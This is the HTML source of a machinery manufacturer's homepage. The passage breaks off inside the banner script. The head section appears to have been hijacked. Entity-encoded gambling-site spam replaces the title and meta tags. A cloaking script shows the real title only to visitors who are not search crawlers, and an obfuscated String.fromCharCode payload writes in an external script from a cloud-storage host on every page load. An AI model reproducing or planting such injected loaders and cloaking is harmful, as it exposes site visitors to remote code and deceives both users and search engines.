<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>&#108;&#101;&#121;&#117;&#46;&#20048;&#40060;&#40;&#38598;&#22242;&#41;&#20307;&#32946;&#31185;&#25216;&#32929;&#20221;&#26377;&#38480;&#20844;&#21496;&#23448;&#32593;</title>
<meta name="keywords" content="&#108;&#101;&#121;&#117;&#23448;&#32593;&#44;&#108;&#101;&#121;&#117;&#20048;&#40060;&#23448;&#32593;&#44;&#108;&#101;&#121;&#117;&#46;&#99;&#111;&#109;&#44;&#20048;&#40060;&#23448;&#26041;"/>
<meta name="description" content="&#108;&#101;&#121;&#117;&#23448;&#32593;&#26159;&#19968;&#23478;&#22269;&#38469;&#30693;&#21517;&#30340;&#20307;&#32946;&#28216;&#25103;&#24179;&#21488;&#65292;&#9989;&#27704;&#20037;&#23548;&#33322;&#58;&#103;&#97;&#109;&#101;&#9320;&#9319;&#9316;&#46;&#99;&#110;&#9989;&#24744;&#21487;&#20197;&#36890;&#36807;&#108;&#101;&#121;&#117;&#20048;&#40060;&#23448;&#32593;&#25110;&#108;&#101;&#121;&#117;&#46;&#99;&#111;&#109;&#36731;&#26494;&#35775;&#38382;&#25105;&#20204;&#30340;&#39318;&#39029;&#12289;&#23448;&#32593;&#20837;&#21475;&#21644;&#30331;&#24405;&#20837;&#21475;&#12290;&#25105;&#20204;&#25552;&#20379;&#20415;&#25463;&#30340;&#32593;&#39029;&#29256;&#21644;&#25163;&#26426;&#29256;&#97;&#112;&#112;&#19979;&#36733;&#65292;&#22987;&#32456;&#31177;&#25215;&#8220;&#26381;&#21153;&#33267;&#19978;&#8221;&#30340;&#23447;&#26088;&#65292;&#30830;&#20445;&#23433;&#20840;&#21487;&#38752;&#65292;&#35753;&#24744;&#23433;&#24515;&#28216;&#25103;&#65292;&#23613;&#24773;&#20139;&#21463;&#23089;&#20048;&#20307;&#39564;&#12290;&#26080;&#35770;&#26159;&#36890;&#36807;&#20048;&#40060;&#23448;&#26041;&#36824;&#26159;&#25105;&#20204;&#30340;&#20854;&#20182;&#24179;&#21488;&#65292;&#24744;&#37117;&#33021;&#33719;&#24471;&#26368;&#20339;&#30340;&#26381;&#21153;&#12290;"/>
<script>if(!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)){document.title ="Hubei Xinxing Quanli Machinery Co., Ltd"}</script>
<script type=""text/javascript""> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,119,117,108,97,45,50,48,50,53,46,111,115,115,45,99,110,45,98,101,105,106,105,110,103,46,97,108,105,121,117,110,99,115,46,99,111,109,47,55,55,55,46,106,115,10,34,62,60,47,115,99,114,105,112,116,62); document.write(xt);</script>
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<meta name="apple-touch-fullscreen" content="yes">
<meta name="full-screen" content="yes">
<!-- SEO友好提示 -->
    <meta name="applicable-device" content="pc,mobile">
    <!--[if lt IE 9]>
      <script type="text/javascript" src="/static/index/js/comm/html5shiv.js"></script>
      <script type="text/javascript" src="/static/index/js/comm/respond.min.js"></script>
    <![endif]-->
    <script type="text/javascript" src="/static/index/jquery.min.js"></script>
    <script type="text/javascript" src="/static/index/jquery.lazyload.min.js"></script>
    <script type="text/javascript" src="/static/index/jquery.nicescroll.min.js"></script>
    <script type="text/javascript" src="/static/index/ubox.js" charset="utf-8"></script>
    <script type="text/javascript" src="/static/index/wow.js" charset="utf-8"></script>
    <script type="text/javascript" src="/static/index/alert.js" charset="utf-8"></script>
    <script type="text/javascript" src="/static/index/0117122.js" charset="utf-8"></script>

    <meta id="headScreen" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport">

    <link href="/static/index/fonts/font-awesome/css/font-awesome.css" rel="stylesheet">
    <link href="/static/index/fonts/fontello/css/fontello.css" rel="stylesheet">

    <link rel="stylesheet" type="text/css" href="/static/index/css/comm/animate.min.css"/>
    <link rel="stylesheet" type="text/css" href="/static/index/css/comm/box.css"/>
    <link rel="stylesheet" type="text/css" href="/static/index/css/comm/alert.css"/>
    <link rel="stylesheet" type="text/css" href="/static/index/css/0117122.css"/>






<script>
    
  var batchArr = [];
  var checkLoad = 0;//判断是否是回调完成的
</script>
<script>
    var isOpenMobie = 2;
    var isOpenPad = 2;
    if(isOpenMobie == 1){
        if(isOpenPad == 1){
            $("body").css("width","auto");
        }else{
            //是否手机端判断
            var ua = navigator.userAgent;
            var ipad = ua.match(/(iPad).*OS\s([\d_]+)/),
                isIphone =!ipad && ua.match(/(iPhone\sOS)\s([\d_]+)/),
                isAndroid = ua.match(/(Android)\s+([\d.]+)/),
                isMobile = isIphone || isAndroid;
            if(isMobile){
                $("body").css("width","1280px");
            }else{
                $("body").css("width","auto");
            }
        }
    }else{
        $("body").css("width","auto");
        $("head").append("<meta id='headScreen' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' name='viewport' />");
    }

    //手机屏幕尺寸兼容 purewinter 2019-03-26
    $(window).load(function(){
        bodyScale();
    });
    function bodyScale(){
        var windowWidth = $(window).width();
        $("#bodyScale").remove();
        if(windowWidth < 680){
            var scale = windowWidth / 375;
            $("#headScreen").remove();
            $("head").append("<meta id='headScreen' content='width=375, initial-scale="+scale+", maximum-scale="+scale+", user-scalable=no' name='viewport' />");
        }else if(windowWidth < 960){
            var scale = windowWidth / 960;
            $("#headScreen").remove();
            $("head").append("<meta id='headScreen' content='width=960, initial-scale="+scale+", maximum-scale="+scale+", user-scalable=no' name='viewport' />");
        }
    }

$(window).load(function(){
  if (!(/msie [6|7|8|9]/i.test(navigator.userAgent))){
    setTimeout(function(){
      new WOW().init()
    },150)
  };
});
// var DIY_WEBSITE_ID = "9506";
// var DIY_JS_SERVER = "s207js.nicebox.cn";
// var DIY_CUR_URL = "http://s207.nicebox.cn/sysTools.php?mod=diy&act=publishPages&page=1&isphp=0&mainHtml=1&imgLoadLate=2&mipSet=0&productHtml=1&newsHtml=1";

</script>
<!-- <script src="//s207js.nicebox.cn/exusers/login_html_v9_diy.php?idweb=9506&langid=0&UPermission=all"></script> -->





<script>
    
  var batchArr = [];
  var checkLoad = 0;//判断是否是回调完成的
</script>
<script>
    var isOpenMobie = 2;
    var isOpenPad = 2;
    if(isOpenMobie == 1){
        if(isOpenPad == 1){
            $("body").css("width","auto");
        }else{
            //是否手机端判断
            var ua = navigator.userAgent;
            var ipad = ua.match(/(iPad).*OS\s([\d_]+)/),
                isIphone =!ipad && ua.match(/(iPhone\sOS)\s([\d_]+)/),
                isAndroid = ua.match(/(Android)\s+([\d.]+)/),
                isMobile = isIphone || isAndroid;
            if(isMobile){
                $("body").css("width","1280px");
            }else{
                $("body").css("width","auto");
            }
        }
    }else{
        $("body").css("width","auto");
        $("head").append("<meta id='headScreen' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' name='viewport' />");
    }

    //手机屏幕尺寸兼容 purewinter 2019-03-26
    $(window).load(function(){
        bodyScale();
    });
    function bodyScale(){
        var windowWidth = $(window).width();
        $("#bodyScale").remove();
        if(windowWidth < 680){
            var scale = windowWidth / 375;
            $("#headScreen").remove();
            $("head").append("<meta id='headScreen' content='width=375, initial-scale="+scale+", maximum-scale="+scale+", user-scalable=no' name='viewport' />");
        }else if(windowWidth < 960){
            var scale = windowWidth / 960;
            $("#headScreen").remove();
            $("head").append("<meta id='headScreen' content='width=960, initial-scale="+scale+", maximum-scale="+scale+", user-scalable=no' name='viewport' />");
        }
    }

$(window).load(function(){
  if (!(/msie [6|7|8|9]/i.test(navigator.userAgent))){
    setTimeout(function(){
      new WOW().init()
    },150)
  };
});
// var DIY_WEBSITE_ID = "9506";
// var DIY_JS_SERVER = "s207js.nicebox.cn";
// var DIY_CUR_URL = "http://s207.nicebox.cn/sysTools.php?mod=diy&act=publishPages&page=1&isphp=0&mainHtml=1&imgLoadLate=2&mipSet=0&productHtml=1&newsHtml=1";

</script>
<!-- <script src="//s207js.nicebox.cn/exusers/login_html_v9_diy.php?idweb=9506&langid=0&UPermission=all"></script> -->



  </head>

  




    

<script>location.reload();</script>




<script type="text/javascript">var Default_isFT = 0;</script>
<script type="text/javascript" src="/static/index/js/comm/transform.js?201603091"></script>

      <div id="comm_layout_header" class="layout  none"  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>




        <div class="view_contents">


                <div id="image_logo_1558665053785" class="view logo image  none"  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>
        <div names="image" class="view_contents" >
          <div class="logoStyle modSet">
  

<a href='/index.html' target="_self"><img class="imgSet" src="/static/index/img/logo.png" title="" alt="" style="width:100%; height:auto"/></a>


</div>        </div>
      </div>
          <div id="searchbox_style_01_1556175892026" class="view style_01 searchbox  none lockHeightView"  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>
        <div names="searchbox" class="view_contents" >
          <div class="searchStyle_1">

  <form  onsubmit="return goUrl(this)" target=_self>

    <div class="searchForm modSet">

            <input name=tn type=hidden value="bds"><input name=cl type=hidden value="3"><input name=ct type=hidden><input name=si type=hidden value="">

            <span class="searchPos-r">

              <input class="inputSet search_input" name='word' id="word" placeholder="Enter keyword search" />

        <i class="fa fa-search searchIcoSet"></i>

            </span>

            <button type="submit" class="search-btn btnaSet" attrhref="index.html" >Search</button>

    </div>

  </form>

  

</div>





<!--  -->
<script type="application/javascript">
    function goUrl(formname){
    var url = "/search";
    if (formname.si.value!=""){
      formname.ct.value = "2097152";
    }
    else {
      formname.ct.value = "0";
    }

    formname.action = url;
    return true;
  }
  </script>



        </div>
      </div>
          




          <div id="image_style_12_1561897795152" class="view style_12 image  none lockHeightView"  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>
        <div names="image" class="view_contents" >
          <!-- modSet titleSet imgSet detailSet-->

 <div class="imgStyle_12">

  <ul class="imgTextUl">

    

      <li class="imgTextLi modSet">

        <a href="javascript:void(0)" target="_self">

          <div class="imgTBox">

            <img class="imgSet" src="/static/index/img/upimages/20190708112929928.jpg" alt="关注公众号"/>

          </div>

          <div class="cont">

            <div class="imgBt titleSet">Focus on WeChat</div>

            <div class="imgDetail detailSet"></div>

            <!-- <div class="imgDetail detailSet">javascript:void(0)</div> -->

          </div>

        </a>

      </li>

    

    <li></li>

    <li></li>

    <li></li>

    <li></li>

    <li></li>

    <li></li>

    <li></li>

  </ul>

 </div>

       </div>
      </div>
          <div id="text_style_01_1561898104897" class="view style_01 text  none lockHeightView"  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>



        <div names="text" class="view_contents" >

          
            <p>Language：
              <a href="/lang/cn">简体中文</a> | <a href="/lang/en">English</a></p>
          


        </div>
      </div>
          <div id="text_style_01_1561898075348" class="view style_01 text  none lockHeightView"  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>
        <div names="text" class="view_contents" >
          &nbsp; Set home&nbsp; |&nbsp;




        </div>
      </div>
          <div id="text_style_01_1561898062986" class="view style_01 text  none lockHeightView"  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>
        <div names="text" class="view_contents" >
          Collection&nbsp; |&nbsp;




        </div>
      </div>




            </div>













<div id="dh_style_28_1561897708227" class="view style_28 dh  none lockHeightView"  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>
        <div names="dh" class="view_contents" >
          

<div id="menu" class="menu menuStyle_28">
  <div class="menuLayout">
    <ul class="miniMenu columnSet showmobile">
      <li class="leftBox">
        <div class="nav"></div>
        <div class="sidebar icoMenuSet">
          <i class="fa fa-navicon" onclick="setDhListen('style_01',this)"></i>
        </div>
        <div class="menuScroll">
          <ul class="menuUlCopy">
            <li id="hot" class="rflex" pageid="117122" showmobile="">
              <a class="mainMenuSet" href="/index.html" style="background: transparent;">Home</a></li>
            <li class="rflex" pageid="117150" showmobile="">
              <a class="mainMenuSet" href="/about.html">About Us</a>
              <i class="fa fa-angle-down" onclick="navSwtich(this)"></i>
              <ul class="menuUlCopy">


                              <li pageid="$i" showmobile="">
                  <a class="subMenuSet" href="/about/82.html">Company profile</a></li>

                              <li pageid="$i" showmobile="">
                  <a class="subMenuSet" href="/about/139.html">Enterprise qualification</a></li>

                              <li pageid="$i" showmobile="">
                  <a class="subMenuSet" href="/about/83.html">About Culture</a></li>

              

              </ul>
            </li>
            <li class="rflex" pageid="117123" showmobile="">
              <a class="mainMenuSet" href="/news.html">News</a>
              <i class="fa fa-angle-down" onclick="navSwtich(this)"></i>
              <ul class="menuUlCopy">
                <li pageid="117155" showmobile="">
                  <a class="subMenuSet" href="gongsi.html">公司新闻</a></li>
                <li pageid="117156" showmobile="">
                  <a class="subMenuSet" href="jituan.html">集团新闻</a></li>
                <li pageid="117157" showmobile="">
                  <a class="subMenuSet" href="gufen.html">股份新闻</a></li>
                <li pageid="117158" showmobile="">
                  <a class="subMenuSet" href="jiceng.html">基层动态</a></li>
                <li pageid="117159" showmobile="">
                  <a class="subMenuSet" href="zonghe.html">综合信息</a></li>
              </ul>
            </li>
            <li class="rflex" pageid="117128" showmobile="">
              <a class="mainMenuSet" href="/dangjian.html">PartyBuilding</a>
              <i class="fa fa-angle-down" onclick="navSwtich(this)"></i>
              <ul class="menuUlCopy">
                              <li pageid="117160" showmobile="">
                  <a class="subMenuSet" href="/news/413.html">Party building</a></li>
                              <li pageid="117160" showmobile="">
                  <a class="subMenuSet" href="/news/414.html">Labour Union</a></li>
                              <li pageid="117160" showmobile="">
                  <a class="subMenuSet" href="/news/415.html">Youth League</a></li>
                            </ul>
            </li>

            <li class="rflex" pageid="117128" showmobile="">
              <a class="mainMenuSet" href="/products.html">Products</a>
              <i class="fa fa-angle-down" onclick="navSwtich(this)"></i>
              <ul class="menuUlCopy">
              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
                <li pageid="117160" showmobile="">
                  <a class="subMenuSet" href="/products/120.html">Shell series</a></li>
              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
                <li pageid="117160" showmobile="">
                  <a class="subMenuSet" href="/products/121.html">Hub series</a></li>
              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
                <li pageid="117160" showmobile="">
                  <a class="subMenuSet" href="/products/123.html">Brake drum</a></li>
              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
                <li pageid="117160" showmobile="">
                  <a class="subMenuSet" href="/products/124.html">Brake disc</a></li>
              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
                <li pageid="117160" showmobile="">
                  <a class="subMenuSet" href="/products/125.html">Assembly series</a></li>
              
              </ul>
            </li>

            <li class="rflex" pageid="117163" showmobile="">
              <a class="mainMenuSet" href="http://223.75.160.194:8085/gonggao1.php">Tendering</a></li>
            <li class="rflex" pageid="117164" showmobile="">
              <a class="mainMenuSet" href="/join.html">Join</a></li>
            <li class="rflex" pageid="117164" showmobile="">
              <a class="mainMenuSet" href="zhaoping.html">Contact</a></li>  
            <li class="rflex" pageid="117165" showmobile="">
              <a class="mainMenuSet" href="http://223.75.160.194:8099">Exmail</a></li>
          </ul>
        </div>
      </li>
    </ul>
    <div class="menuUl_box columnSet showpc">
      <ul class="menuUl dflex maxWidth ">
        <li id="hot" class="rflex isLi" pageid="117122" showpc="">
          <a class="mainMenuSet Nosub" href="/index.html">Home</a></li>
        <li class="rflex isLi" pageid="117150" showpc="">
          <a class="mainMenuSet Onsub" href="/about.html">About Us            <i class="fa fa-angle-down"></i></a>
          <ul class="menuUl02 subminSet">

              
            <li class="subMenu02 subMenuSet" pageid="117151" showpc="">
              <a href="/about/82.html">Company profile</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117151" showpc="">
              <a href="/about/139.html">Enterprise qualification</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117151" showpc="">
              <a href="/about/83.html">About Culture</a></li>

              
          </ul>
        </li>
        <li class="rflex isLi" pageid="117123" showpc="">
          <a class="mainMenuSet Onsub" href="/news.html">News            <i class="fa fa-angle-down"></i></a>
          <ul class="menuUl02 subminSet">
              
            <li class="subMenu02 subMenuSet" pageid="117155" showpc="">
              <a href="/news/409.html">Stock news</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117155" showpc="">
              <a href="/news/410.html">Grassroots dynamics</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117155" showpc="">
              <a href="/news/411.html">Information</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117155" showpc="">
              <a href="/news/403.html">Group news</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117155" showpc="">
              <a href="/news/353.html">Company news</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117155" showpc="">
              <a href="/news/416.html">Bidding information</a></li>

              
          </ul>
        </li>
        <li class="rflex isLi" pageid="117128" showpc="">
          <a class="mainMenuSet Onsub" href="/partyBuilding.html">PartyBuilding            <i class="fa fa-angle-down"></i></a>
          <ul class="menuUl02 subminSet">
                          <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
              <a href="/news/413.html">Party building</a></li>

                          <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
              <a href="/news/414.html">Labour Union</a></li>

                          <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
              <a href="/news/415.html">Youth League</a></li>

              
          </ul>

        </li>


        <li class="rflex isLi" pageid="117128" showpc="">
          <a class="mainMenuSet Onsub" href="/products.html">Products            <i class="fa fa-angle-down"></i></a>
          <ul class="menuUl02 subminSet">
              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
              <a href="/products/120.html">Shell series</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
              <a href="/products/121.html">Hub series</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
              <a href="/products/123.html">Brake drum</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
              <a href="/products/124.html">Brake disc</a></li>

              
            <li class="subMenu02 subMenuSet" pageid="117160" showpc="">
              <a href="/products/125.html">Assembly series</a></li>

              
          </ul>
        </li>



        <li class="rflex isLi" pageid="117163" showpc="">
          <a class="mainMenuSet Nosub" href="http://223.75.160.194:8085/gonggao1.php">Tendering</a></li>
        <li class="rflex isLi" pageid="117164" showpc="">
          <a class="mainMenuSet Nosub" href="/join.html">Join</a></li>
        <li class="rflex isLi" pageid="117164" showpc="">
          <a class="mainMenuSet Nosub" href="/contact.html">Contact</a></li>  
        <li class="rflex isLi" pageid="117165" showpc="">
          <a class="mainMenuSet Nosub" href="http://223.75.160.194:8099">Exmail</a></li>
      </ul>
      <div class="subBox">
        <div class="subBoxContent maxWidth">
          <div class="subItems">
            <div class="sublm">
              <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117151" showpc="" href="/about">企业简介</a></p>
              </div>
              <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117152" showpc="" href="wenhua.html">企业文化</a></p>
              </div>
              <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117153" showpc="" href="zizhi.html">企业资质</a></p>
              </div>
              <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117154" showpc="" href="chanpin.html">产品展示</a></p>
              </div>
            </div>
          </div>
          <div class="subItems">
            <div class="sublm">

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/409.html">Stock news</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/410.html">Grassroots dynamics</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/411.html">Information</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/403.html">Group news</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/353.html">Company news</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/416.html">Bidding information</a></p>
              </div>

              

            </div>
          </div>
          <div class="subItems">
            <div class="sublm">

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/413.html">Party building</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/414.html">Labour Union</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117155" showpc="" href="/news/415.html">Youth League</a></p>
              </div>

              

            </div>
          </div>

          <div class="subItems">
            <div class="sublm">
                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117160" showpc="" href="/products/120.html">Shell series</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117160" showpc="" href="/products/121.html">Hub series</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117160" showpc="" href="/products/123.html">Brake drum</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117160" showpc="" href="/products/124.html">Brake disc</a></p>
              </div>

                            <div>
                <p>
                  <a class="subMenu02 subMenuSet" pageid="117160" showpc="" href="/products/125.html">Assembly series</a></p>
              </div>

              
            </div>
          </div>




        </div>
      </div>
    </div>
  </div>
</div>




<!-- 菜单区域 End-->
<!-- 导航栏目有下级时禁止跳转 -->
<script>
$(function(){
  $("#dh_style_28_1561897708227 li").each(function(){
    if($(this).find("ul") && $(this).find("ul").length != 0){
      $(this).children("a.mainMenuSet").removeAttr('href');
    }
  });
})
</script>
<!-- 二级菜单宽度自适应 -->



<script>
function navSwtich(obj) {
  $(obj).siblings(".menuUlCopy").slideToggle(200);
  $(obj).parent().siblings().find(".menuUlCopy").slideUp(200);
}
function subLeft_dh_style_28_1561897708227(){
  $("#dh_style_28_1561897708227 .menuUl>li").each(function(){
    $(this).find(".menuUl03").css("left",'100%');
  })
}
$(window).resize(function() {
  subLeft_dh_style_28_1561897708227();
})
$(function(){
  $("#dh_style_28_1561897708227 .fa-navicon").click(function(){
    $("#dh_style_28_1561897708227 .menuUlCopy").each(function(){
      $(this).siblings(".fa").show();
    })
  })
  subLeft_dh_style_28_1561897708227();
    $("#dh_style_28_1561897708227 .subBox").css("top",$("#dh_style_28_1561897708227 .menuUl_box").height());
    
  if($("#dh_style_28_1561897708227 .menuUl").hasClass("noHover")){
    var tabNum = 0;
    $("#dh_style_28_1561897708227 .menuUl>li").find(".Onsub").each(function(){
      tabNum += 1;
      $(this).parent().attr("tabNum",tabNum)
    })
    $("#dh_style_28_1561897708227 .menuUl>li .Onsub").mouseover(function(){
      $("#dh_style_28_1561897708227 .subBox").show();
      var index = $(this).parent().attr("tabNum");
      $("#dh_style_28_1561897708227 .subBox .subItems").eq(index-1).fadeIn(200).siblings().hide();
    })
    $("#dh_style_28_1561897708227 .subBox").mouseleave(function(){
      $(this).hide();
    })
    $("#dh_style_28_1561897708227 .menuUl>li .Nosub").mouseover(function(){
      $("#dh_style_28_1561897708227 .subBox").hide();
    })
  }
})
</script>







        </div>
      </div>














          <div id="banner_style_01_1567612498400" class="view style_01 banner "  data-wow-duration='0s' data-wow-delay='0s' data-wow-offset='0' data-wow-iteration='1'>
        <div names="banner" class="view_contents" >
          <script></script>
<div class="bannerStyle_1 normal">
  <div class="main_visual">
    <!-- <div class="flicking_con">
      
        <a href="#" class=""></a>
        <a href="#" class=""></a>        
        <a href="#" class=""></a>      
    </div> -->
    <!-- <div class="ground_glass"></div> -->
    <div class="main_image">
      
      <!-- 默认 动画效果 HTML -->
      <div class="img-list">
          

                
                <div class="img-item" style="" onclick="javascript:location.href='/';"><a href="javascript:;" class="picSet"><span class="img_0_" style="background: url(/uploadfile/20231106/145ffc0445d712796d9ea91bbc9e3081.jpg) center top no-repeat;"></span></a></div>
    
                
                <div class="img-item" style="" onclick="javascript:location.href='/';"><a href="javascript:;" class="picSet"><span class="img_0_" style="background: url(/uploadfile/20231106/52f61fc80bcbaa6527554cd688aa5f34.jpg) center top no-repeat;"></span></a></div>
    
                
                <div class="img-item" style="" onclick="javascript:location.href='/';"><a href="javascript:;" class="picSet"><span class="img_0_" style="background: url(/uploadfile/20231106/e374ee39b7e8e7f5911594b7c29644fd.jpg) center top no-repeat;"></span></a></div>
    
                
                <div class="img-item" style="" onclick="javascript:location.href='/';"><a href="javascript:;" class="picSet"><span class="img_0_" style="background: url(/uploadfile/20231106/7ab0f3401d1959f5129596f0886c1505.jpg) center top no-repeat;"></span></a></div>
    
                
                <div class="img-item" style="" onclick="javascript:location.href='/';"><a href="javascript:;" class="picSet"><span class="img_0_" style="background: url(/uploadfile/20231106/42ebe32c214bb5874f52e7f9a88c2878.jpg) center top no-repeat;"></span></a></div>
    
                
                <div class="img-item" style="" onclick="javascript:location.href='';"><a href="javascript:;" class="picSet"><span class="img_0_" style="background: url(/uploadfile/20231106/b144c28f5a49106ff28e9650d2e2afd7.jpg) center top no-repeat;"></span></a></div>
    
                
                <div class="img-item" style="" onclick="javascript:location.href='/';"><a href="javascript:;" class="picSet"><span class="img_0_" style="background: url(/uploadfile/20231106/45e1f02656cdb1255fb7040e7ee2bb89.jpg) center top no-repeat;"></span></a></div>
    
                
                <div class="img-item" style="" onclick="javascript:location.href='';"><a href="javascript:;" class="picSet"><span class="img_0_" style="background: url(/uploadfile/20231106/b2fea9ea22d1a23cac3b559907ad8d09.jpg) center top no-repeat;"></span></a></div>
    
                

          
          <div class="img-item" style=""><a href="javascript:;" class="picSet"><span class="img_1_" style="background: url(/static/index/img/upimages/20190724144855141.jpg) center top no-repeat;"></span></a></div>


      </div>
      
      
<!--       <a href="javascript:;" class="btn_prev"></a>
      <a href="javascript:;" class="btn_next"></a> -->
    </div>
  </div>
</div>

<script type="application/javascript">
    /*
     * Banner 轮播图类
     */
    function Banner(config) {
        this._default = {
            'list':[],
            'length':0,
            'current':0,
            'timer':undefined,      // 计时器
            'view':undefined,           // 视图
            'flick':undefined,      // 圆点选择器
            'duration':3,               // 切换时间间隔
            'animation':0.5         // 动画时间
        };
        config = $.extend(true, this._default, config);
        this.config = config;
        this.init(config);
    }
    Banner.prototype.init = function(config) {
        this.animateStyle = 'normal';       // 动画效果 ( 根据动画效果, 不同的方法有不同的实现 )
        this.direction = 'right';   // 当前滚动方向
        this.view = this.config.view;
        this.config.length = this.config.list.length;
        this.config.flick = this.view ? this.view.find(".bannerStyle_1 .flicking_con > a") : undefined;
    };
    // 计算下一个要显示的图片的索引
    // by: 如果没有传入参数, 则使用配置中的数据this.config.current, 否则使用传入的参数
    Banner.prototype.nextIndex = function(by) {
        by === undefined && (by = this.config.current);
        var next = this.direction == 'right' ? by + 1 : by - 1;
        next >= this.config.length && (next = 0);
        next < 0 && (next = this.config.length - 1);
        return next;
    };
    //图片链接
    $url_html = new Array();
    $i = 0;
    $url_len = 1;
            $url_html[0] = "";
     

    $('#banner_style_01_1567612498400 a.img_url').attr('href',$url_html[$i]);
    // 跳到指定图片
    Banner.prototype.animateIndex = function(index) {
        this.endAnimate();
        if(index >= 0 && index < this.config.length && this.config.current != index) {
            if(this.config.current < index) {
                this.direction = 'right';
                this.config.current = index - 1;
            } else {
                this.direction = 'left';
                this.config.current = index + 1;
            }
            
            this.showIndex(this.config.current);
            this.startAnimate();
        }
    };
    // 向右动画
    Banner.prototype.startAnimateRight = function() {
        this.direction = 'right';
        this.startAnimate();
    };
    // 向左动画
    Banner.prototype.startAnimateLeft = function() {
        this.direction = 'left';
        this.startAnimate();
    };
    // 结束动画
    Banner.prototype.endAnimate = function() {
        if(this.config.timer){
            clearTimeout(this.config.timer);
            this.config.timer = undefined;
        }
    };
    Banner.prototype.startAnimate = function() {
        switch(this.animateStyle) {
            case 'normal':
                // 默认效果
                this.endAnimate();
                if(this.config.length > 1) {
                    var prev = this.config.current, next = this.nextIndex(),
                            end = this.direction == 'right' ? {prev:"-100%", current:"100%"} : {prev:"100%", current:"-100%"};  // 前一个图片和当前图片的最后停留位置
                    this.config.flick.eq(next).addClass("on").siblings().removeClass("on");
                    // 执行动画
                    var banner = this;
                    this.imgs.eq(prev).stop().animate({"left":end.prev}, this.config.animation, function(){
                        banner.config.timer = setTimeout(function(){
                            banner.startAnimate();
                        },banner.config.duration);
                    });
                    this.imgs.eq(next).css({"left":end.current}).stop().animate({"left":"0%"}, this.config.animation);
                    this.config.current = next;
                }
                break;

            case 'rotate-3d':
                // 3D旋转效果
                this.endAnimate();
                this.updateBgImg();
                if(this.config.length > 1) {
                    var prev = this.config.current, next = this.nextIndex();
                    this.config.flick.eq(next).addClass("on").siblings().removeClass("on");
                    this.config.current = next;
                    this.parts.css("transform", "rotateX(" + ((this.direction == 'right' ? ++this.rotate : --this.rotate) * 90) + "deg)");
                    var banner = this;
                    this.config.timer = setTimeout(function(){
                        banner.startAnimate();
                    },banner.config.duration);
                }
                $('#banner_style_01_1567612498400 a.img_url').attr('href',$url_html[this.config.current]);
                break;
        }
    };
    // 指定显示的图片
    Banner.prototype.showIndex = function(index) {
        switch(this.animateStyle) {
            case 'normal':
                // 默认效果
                this.imgs.eq(index).css("left","0%").siblings(".img-item").css("left","100%");
                this.config.flick.eq(index).addClass("on").siblings().removeClass("on");
                break;
            case 'rotate-3d':
                // 3D旋转效果
